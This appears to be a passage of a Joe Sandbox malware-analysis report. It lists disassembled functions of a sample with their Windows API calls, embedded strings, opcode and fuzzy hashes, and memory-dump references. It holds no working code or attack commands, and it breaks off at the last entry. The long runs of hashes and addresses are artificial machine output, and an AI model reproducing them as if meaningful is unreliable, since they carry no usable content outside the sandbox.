                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                        • API String ID: 2698844021-4113822522
                                        • Opcode ID: 42b7ddbb1307207e3bea4bf4339aa954a8b8d643065ae4665fb7aa4b84f8482c
                                        • Instruction ID: 591a2e0d81b2336ed90ba54eec69aa323d679cbc804c7f249c9c5f2bab262848
                                        • Opcode Fuzzy Hash: 42b7ddbb1307207e3bea4bf4339aa954a8b8d643065ae4665fb7aa4b84f8482c
                                        • Instruction Fuzzy Hash: 11515B71104305EFCB04EF10C89596AB7E5FF88758F50886CF89997261EB79EE05CB52
                                        Function 007B3110 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 129windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,007E4085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 007B3145
                                        • LoadStringW.USER32(00000000,?,007E4085,00000016), ref: 007B314E
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,007E4085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 007B3170
                                        • LoadStringW.USER32(00000000,?,007E4085,00000016), ref: 007B3173
                                        • __swprintf.LIBCMT ref: 007B31B3
                                        • __swprintf.LIBCMT ref: 007B31C5
                                        • _wprintf.LIBCMT ref: 007B326C
                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007B3283
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                        • API String ID: 984253442-2268648507
                                        • Opcode ID: e01fbdc43cac369cd6bd056826e96d886983572c06c72ba9ffd258167ebe5e1f
                                        • Instruction ID: 291cbc7e35c420539216e91cbb64594f5c628cdbab2fe209859cc712cfb128a5
                                        • Opcode Fuzzy Hash: e01fbdc43cac369cd6bd056826e96d886983572c06c72ba9ffd258167ebe5e1f
                                        • Instruction Fuzzy Hash: EF41407290421DFACF15FBD0DD9BEEEB778AF14741F104065B205B21A2DA6D6F44CA60
                                        Function 007BD950 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 007BD96C
                                        • __swprintf.LIBCMT ref: 007BD98E
                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 007BD9CB
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007BD9F0
                                        • _memset.LIBCMT ref: 007BDA0F
                                        • _wcsncpy.LIBCMT ref: 007BDA4B
                                        • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 007BDA80
                                        • CloseHandle.KERNEL32(00000000), ref: 007BDA8B
                                        • RemoveDirectoryW.KERNEL32(?), ref: 007BDA94
                                        • CloseHandle.KERNEL32(00000000), ref: 007BDA9E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                        • String ID: :$\$\??\%s
                                        • API String ID: 2733774712-3457252023
                                        • Opcode ID: 7a2e2d4d8e0cec194459c96a133b01b2ab709e69cf4e04e8202f15500292b91e
                                        • Instruction ID: 3736d8344c17837738ce8b909ae79fd03665886edf21effa455feb748b4ba8cb
                                        • Opcode Fuzzy Hash: 7a2e2d4d8e0cec194459c96a133b01b2ab709e69cf4e04e8202f15500292b91e
                                        • Instruction Fuzzy Hash: B0319272600208AADB30DFA4DC49FEA77BDFF84710F0081A5F519D2161E7789E41CBA5
                                        Function 007DE541 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,007DBD04,?,?), ref: 007DE564
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,007DBD04,?,?,00000000,?), ref: 007DE57B
                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,007DBD04,?,?,00000000,?), ref: 007DE586
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,007DBD04,?,?,00000000,?), ref: 007DE593
                                        • GlobalLock.KERNEL32(00000000), ref: 007DE59C
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,007DBD04,?,?,00000000,?), ref: 007DE5AB
                                        • GlobalUnlock.KERNEL32(00000000), ref: 007DE5B4
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,007DBD04,?,?,00000000,?), ref: 007DE5BB
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 007DE5CC
                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,007FD9BC,?), ref: 007DE5E5
                                        • GlobalFree.KERNEL32(00000000), ref: 007DE5F5
                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 007DE619
                                        • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 007DE644
                                        • DeleteObject.GDI32(00000000), ref: 007DE66C
                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007DE682
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                        • String ID:
                                        • API String ID: 3840717409-0
                                        • Opcode ID: a6d949b7cf1ce5629468a752c7173f4e3c826ca74b4976fdb7e67ecfbd2ce32c
                                        • Instruction ID: ec0f6e3d7ffe5fef9f4533589ef409ec2c0ef1133e948ba6f686d84c3895dee9
                                        • Opcode Fuzzy Hash: a6d949b7cf1ce5629468a752c7173f4e3c826ca74b4976fdb7e67ecfbd2ce32c
                                        • Instruction Fuzzy Hash: 5D414A75600208EFDB21AF64DC88EAE7BBAFF89715F108059F906DB260D7389D01DB64
                                        Function 007C0B20 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229COMMON
                                        Download Yara Rule
                                        APIs
                                        • __wsplitpath.LIBCMT ref: 007C0C93
                                        • _wcscat.LIBCMT ref: 007C0CAB
                                        • _wcscat.LIBCMT ref: 007C0CBD
                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 007C0CD2
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007C0CE6
                                        • GetFileAttributesW.KERNEL32(?), ref: 007C0CFE
                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 007C0D18
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007C0D2A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                        • String ID: *.*
                                        • API String ID: 34673085-438819550
                                        • Opcode ID: 5d9e9d9dac0634160ef277a4d0b2621e2ecae71ef17576b7b671e1410be770d4
                                        • Instruction ID: 5bfc8917d899295323fd7df7043bb53bc622fcdec1af659cbeb1272f60bf8365
                                        • Opcode Fuzzy Hash: 5d9e9d9dac0634160ef277a4d0b2621e2ecae71ef17576b7b671e1410be770d4
                                        • Instruction Fuzzy Hash: 43815371604245DFCB64DF64C845FAAB7E8BB88314F14892EE885C7251E738ED85CBE2
                                        Function 007AB593 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007AB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 007AB903
                                          • Part of subcall function 007AB8E7: GetLastError.KERNEL32(?,007AB3CB,?,?,?), ref: 007AB90D
                                          • Part of subcall function 007AB8E7: GetProcessHeap.KERNEL32(00000008,?,?,007AB3CB,?,?,?), ref: 007AB91C
                                          • Part of subcall function 007AB8E7: RtlAllocateHeap.NTDLL(00000000,?,007AB3CB), ref: 007AB923
                                          • Part of subcall function 007AB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 007AB93A
                                          • Part of subcall function 007AB982: GetProcessHeap.KERNEL32(00000008,007AB3E1,00000000,00000000,?,007AB3E1,?), ref: 007AB98E
                                          • Part of subcall function 007AB982: RtlAllocateHeap.NTDLL(00000000,?,007AB3E1), ref: 007AB995
                                          • Part of subcall function 007AB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007AB3E1,?), ref: 007AB9A6
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007AB5F7
                                        • _memset.LIBCMT ref: 007AB60C
                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007AB62B
                                        • GetLengthSid.ADVAPI32(?), ref: 007AB63C
                                        • GetAce.ADVAPI32(?,00000000,?), ref: 007AB679
                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007AB695
                                        • GetLengthSid.ADVAPI32(?), ref: 007AB6B2
                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007AB6C1
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007AB6C8
                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007AB6E9
                                        • CopySid.ADVAPI32(00000000), ref: 007AB6F0
                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007AB721
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007AB747
                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007AB75B
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                        • String ID:
                                        • API String ID: 2347767575-0
                                        • Opcode ID: 1efae7d0c216aeb796aa6ea88ad9b0af356dfd77758ea03faaf1a6fec7650d94
                                        • Instruction ID: 957ee81d89bf06689979803623c6b0506782ed28967a1510619bd52e6a4af5c8
                                        • Opcode Fuzzy Hash: 1efae7d0c216aeb796aa6ea88ad9b0af356dfd77758ea03faaf1a6fec7650d94
                                        • Instruction Fuzzy Hash: AF515F71900209EBDF109F94DC85EFEBB7AFF89304F04825AE915A6292DB789905CB64
                                        Function 007CA268 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDC.USER32(00000000), ref: 007CA2DD
                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 007CA2E9
                                        • CreateCompatibleDC.GDI32(?), ref: 007CA2F5
                                        • SelectObject.GDI32(00000000,?), ref: 007CA302
                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 007CA356
                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 007CA392
                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 007CA3B6
                                        • SelectObject.GDI32(00000006,?), ref: 007CA3BE
                                        • DeleteObject.GDI32(?), ref: 007CA3C7
                                        • DeleteDC.GDI32(00000006), ref: 007CA3CE
                                        • ReleaseDC.USER32(00000000,?), ref: 007CA3D9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                        • String ID: (
                                        • API String ID: 2598888154-3887548279
                                        • Opcode ID: 62b8622501110f37093e2854ebb7745b76145a16b72f7bb9af2dc741597ff159
                                        • Instruction ID: e0caf884021a2c1bc04dc9a3ccab3e2de74c876e1ea26ceb5a491f30d632bd83
                                        • Opcode Fuzzy Hash: 62b8622501110f37093e2854ebb7745b76145a16b72f7bb9af2dc741597ff159
                                        • Instruction Fuzzy Hash: AA513875900209EFCB25CFA8DC88EAEBBB9EF48310F14851DF95A97250C739AC41CB54
                                        Function 007BD520 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 144COMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadStringW.USER32(00000066,?,00000FFF), ref: 007BD567
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 007BD589
                                        • __swprintf.LIBCMT ref: 007BD5DC
                                        • _wprintf.LIBCMT ref: 007BD68D
                                        • _wprintf.LIBCMT ref: 007BD6AB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: LoadString_wprintf$__swprintf_memmove
                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                        • API String ID: 2116804098-2391861430
                                        • Opcode ID: eab9bddfcd0bf40cf2dcc0acf22aeb1de3e5febe280e74214e30401359e3fd03
                                        • Instruction ID: 2006199c186eb21f73f811690361e4a28316b9a899d25e99bd6b8bd02f3ed943
                                        • Opcode Fuzzy Hash: eab9bddfcd0bf40cf2dcc0acf22aeb1de3e5febe280e74214e30401359e3fd03
                                        • Instruction Fuzzy Hash: 0251D372900209FACF15EBA0DD4AEEEB779AF04344F108565F109A21A1EA796F54DF60
                                        Function 007BD338 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 140COMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 007BD37F
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007BD3A0
                                        • __swprintf.LIBCMT ref: 007BD3F3
                                        • _wprintf.LIBCMT ref: 007BD499
                                        • _wprintf.LIBCMT ref: 007BD4B7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: LoadString_wprintf$__swprintf_memmove
                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                        • API String ID: 2116804098-3420473620
                                        • Opcode ID: ff921b759b90a57e9e1978787d19c78fe6ec7e4fcce2cd76b77b9b55e0a5e3b4
                                        • Instruction ID: f2d47d7b02210281ba37a0d0fc2b5dc4c24b0f964c843b4e6c6e2778cbb4e489
                                        • Opcode Fuzzy Hash: ff921b759b90a57e9e1978787d19c78fe6ec7e4fcce2cd76b77b9b55e0a5e3b4
                                        • Instruction Fuzzy Hash: A051D372900609EACF25FBA0DD5AEEEB778AF14700F108465B109B2161EA7D6F58DF60
                                        Function 007AAEE5 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00777E53: _memmove.LIBCMT ref: 00777EB9
                                        • _memset.LIBCMT ref: 007AAF74
                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007AAFA9
                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007AAFC5
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007AAFE1
                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 007AB00B
                                        • CLSIDFromString.COMBASE(?,?), ref: 007AB033
                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007AB03E
                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007AB043
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                        • API String ID: 1411258926-22481851
                                        • Opcode ID: eba560de4fbdee5e5027ad88e5245b729191f64e9517fa380eb5e381e4aefd53
                                        • Instruction ID: 06dbb2362d33949ba22b942c59872d9bd412ee41bafbdaa483700db19fcf5a4d
                                        • Opcode Fuzzy Hash: eba560de4fbdee5e5027ad88e5245b729191f64e9517fa380eb5e381e4aefd53
                                        • Instruction Fuzzy Hash: 7A411876C1022DEACF25EBA4DC99DEEB778FF04740F408129E915A2161EB789E14CF50
                                        Function 007D3AF7 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,007D2AA6,?,?), ref: 007D3B0E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper
                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                        • API String ID: 3964851224-909552448
                                        • Opcode ID: 569dadf3691ae1d75f323303453feac12792a75af2813c925ce509ac10f004c6
                                        • Instruction ID: e37da700834600902a874c5a2d350fb5c52b021bd5a8364c04a9ec8b7a5aa460
                                        • Opcode Fuzzy Hash: 569dadf3691ae1d75f323303453feac12792a75af2813c925ce509ac10f004c6
                                        • Instruction Fuzzy Hash: C3419E3416024ACBDF04EF44E844AEA3361FF25390F144826ECA59B395DB789E59CB72
                                        Function 007B83D6 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00777E53: _memmove.LIBCMT ref: 00777EB9
                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007B843F
                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007B8455
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007B8466
                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 007B8478
                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 007B8489
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: SendString$_memmove
                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                        • API String ID: 2279737902-1007645807
                                        • Opcode ID: ccaddbaf87011c16241f340e5806925a72d5e07cf8fd6308270584708aca9537
                                        • Instruction ID: 4dacf0122d148039d463213e9cb6d869509c7bad1e27923bb91f8713fdedee17
                                        • Opcode Fuzzy Hash: ccaddbaf87011c16241f340e5806925a72d5e07cf8fd6308270584708aca9537
                                        • Instruction Fuzzy Hash: 0C11C8616401ADB9DB20A7A1DC5EEFF7B7CFB91B40F404429B421E21D0DEAC5E44C5B1
                                        Function 007B8097 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                        Download Yara Rule
                                        APIs
